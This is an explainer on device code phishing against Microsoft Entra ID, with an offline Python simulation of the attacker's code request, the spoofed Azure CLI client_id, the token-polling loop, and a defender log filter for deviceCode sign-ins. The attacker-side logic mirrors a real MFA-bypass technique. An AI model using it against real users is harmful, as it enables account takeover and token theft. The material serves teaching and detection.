The Device Code Flow (RFC 8628) is a legitimate OAuth 2.0 grant designed for input-constrained devices such as smart TVs and IoT endpoints. In the hands of a red teamer or adversary it becomes an elegant and effective MFA bypass. The weakness is structural: the device that requests the code and polls for tokens is not the device on which the user authenticates. By convincing a victim to enter a short code on the genuine `microsoft.com/devicelogin` page, the attacker has the victim satisfy MFA and Conditional Access from the victim's own trusted, compliant browser, because those policies are evaluated against the interactive sign-in, not against the polling client. Meanwhile the attacker's script, running on an untrusted machine, polls the token endpoint and is handed a fully validated access token together with a refresh token. Strictly this is not a Primary Refresh Token, which is bound to a registered device, but the refresh token is enough to mint fresh access tokens for as long as it remains valid and unrevoked. No password is stolen and no MFA fatigue is needed; it is session hijacking at the protocol level.
The attack begins by requesting a device code and a matching user code from the Entra ID tenant's `devicecode` endpoint. The attacker deliberately supplies the `client_id` of a trusted first-party Microsoft application, such as the Azure CLI or Microsoft Graph PowerShell, so that the page the victim sees ("Are you trying to sign in to Microsoft Azure CLI?") names a familiar Microsoft application and, because first-party apps are already consented, no separate consent prompt appears. The code is only valid for 15 minutes, so the lure has to land and be acted on inside that window.
While the victim is socially engineered into entering the code (for example via an urgent "IT support" Teams message), the attacker's machine polls the Entra ID token endpoint with `grant_type=urn:ietf:params:oauth:grant-type:device_code`, backing off on `authorization_pending` and `slow_down` responses. The moment the victim completes sign-in and MFA in their browser, Entra hands the access and refresh tokens to the attacker's polling script. Nothing alerts by default, but the sign-in is not invisible: the Entra sign-in log records the event with Authentication Protocol set to Device Code, which is the pivot for hunting, and Conditional Access can block the flow outright through its authentication flows condition.
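The full exchange described in the two paragraphs above, as an added, offline example written for this page rather than taken from any published tool: the attacker's code request and polling loop, the victim's browser-side approval, the tenant releasing tokens to the poller, and the sign-in log entry a defender can hunt on. The endpoint URLs, grant type, and the Azure CLI `client_id` are the real public values; `FakeEntra`, the simulated clock, the user `alice@contoso.example`, and the token strings are constructed stand-ins so the script runs with no network access.

```python
"""Device code phishing, both sides, as a constructed offline walkthrough.

Endpoint URLs, grant type and the Azure CLI client_id are the real public
values; FakeEntra is a stand-in for login.microsoftonline.com so the exchange
runs without network access and on a simulated clock.
"""
import secrets

AUTHORITY = "https://login.microsoftonline.com/common/oauth2/v2.0"
DEVICECODE_URL = AUTHORITY + "/devicecode"  # attacker POSTs client_id + scope here
TOKEN_URL = AUTHORITY + "/token"            # attacker polls here with the device_code
DEVICE_CODE_GRANT = "urn:ietf:params:oauth:grant-type:device_code"
AZURE_CLI_CLIENT_ID = "04b07795-8ddb-461a-bbee-02f9e1bf7b46"  # first-party Azure CLI
CODE_LIFETIME = 15 * 60  # Entra device codes expire after 15 minutes
POLL_INTERVAL = 5        # seconds; polling faster than this earns slow_down


class FakeEntra:
    """Constructed stand-in for the tenant: issues the code, records the victim's
    browser sign-in, and hands tokens to whichever client polls with the code."""

    def __init__(self, clock):
        self.clock, self.pending, self.sign_in_log = clock, {}, []

    def devicecode(self, client_id, scope):
        code = secrets.token_urlsafe(48)
        user_code = "".join(secrets.choice("ABCDEFGHJKLMNPQRSTUVWXYZ23456789") for _ in range(9))
        self.pending[code] = {"client_id": client_id, "scope": scope, "user_code": user_code,
                              "expires_at": self.clock() + CODE_LIFETIME,
                              "approved_by": None, "last_poll": None}
        return {"device_code": code, "user_code": user_code, "interval": POLL_INTERVAL,
                "expires_in": CODE_LIFETIME, "verification_uri": "https://microsoft.com/devicelogin",
                "message": f"Open https://microsoft.com/devicelogin and enter the code {user_code}."}

    def victim_enters_code(self, user_code, upn):
        """Browser side: the victim types the code and satisfies MFA and Conditional
        Access from their own compliant device. The sign-in log entry stays here;
        the tokens go to the polling client."""
        for entry in self.pending.values():
            if entry["user_code"] == user_code and self.clock() <= entry["expires_at"]:
                entry["approved_by"] = upn
                self.sign_in_log.append({"userPrincipalName": upn, "appId": entry["client_id"],
                                         "authenticationProtocol": "deviceCode"})
                return True
        return False  # unknown or expired code: the victim just sees an error page

    def token(self, client_id, device_code):
        entry = self.pending.get(device_code)
        if entry is None or entry["client_id"] != client_id:
            return {"error": "invalid_grant"}
        now = self.clock()
        if now > entry["expires_at"]:
            del self.pending[device_code]
            return {"error": "expired_token"}
        if entry["last_poll"] is not None and now - entry["last_poll"] < POLL_INTERVAL:
            return {"error": "slow_down"}
        entry["last_poll"] = now
        if entry["approved_by"] is None:
            return {"error": "authorization_pending"}
        del self.pending[device_code]
        return {"token_type": "Bearer", "scope": entry["scope"], "expires_in": 3600,
                "access_token": "eyJ0eXAi." + secrets.token_urlsafe(24),  # placeholder JWT
                "refresh_token": secrets.token_urlsafe(32), "subject": entry["approved_by"]}


def poll_for_tokens(tenant, client_id, grant, clock, sleep):
    """Attacker side: the polling loop a phishing script runs, honouring the
    interval, slow_down and the expiry window as RFC 8628 requires."""
    interval, deadline = grant["interval"], clock() + grant["expires_in"]
    while clock() < deadline:
        resp = tenant.token(client_id, grant["device_code"])  # real tool: POST TOKEN_URL with DEVICE_CODE_GRANT
        if "access_token" in resp:
            return resp
        if resp.get("error") == "slow_down":
            interval += 5
        elif resp.get("error") != "authorization_pending":
            return resp  # expired_token, access_denied, invalid_grant: give up
        sleep(interval)
    return {"error": "expired_token"}


def run_phish(victim_delay, upn="alice@contoso.example"):
    """One lure on a simulated clock: attacker requests a code at t=0 as 'Azure CLI';
    the victim enters it victim_delay seconds later. Returns (token response, sign-in log)."""
    now = [0.0]
    tenant = FakeEntra(lambda: now[0])
    grant = tenant.devicecode(AZURE_CLI_CLIENT_ID, "https://graph.microsoft.com/.default offline_access")
    entered = [False]

    def sleep(seconds):  # advance the clock; the victim acts once victim_delay has passed
        now[0] += seconds
        if not entered[0] and now[0] >= victim_delay:
            entered[0] = True
            tenant.victim_enters_code(grant["user_code"], upn)

    return poll_for_tokens(tenant, AZURE_CLI_CLIENT_ID, grant, lambda: now[0], sleep), tenant.sign_in_log


def device_code_sign_ins(sign_in_log):
    """Defender side: Entra sign-in records carry authenticationProtocol; every
    deviceCode entry deserves a look at which app and user it was for."""
    return [e for e in sign_in_log if e.get("authenticationProtocol") == "deviceCode"]


if __name__ == "__main__":
    tokens, log = run_phish(victim_delay=120)   # victim bites two minutes in
    print("attacker holds a refresh token for", tokens["subject"], "via app", log[0]["appId"])
    late, _ = run_phish(victim_delay=20 * 60)   # lure landed after the 15-minute window
    print("late lure:", late["error"])
```

The two runs show the practical constraint and the detection hook together: when the victim acts inside the 15-minute lifetime the poller walks away with the refresh token while the only trace on the victim side is a sign-in record whose `authenticationProtocol` is `deviceCode`; when the victim is slower than the code lifetime the poller exhausts `expires_in` and gets `expired_token`, and the attacker has to send a fresh lure.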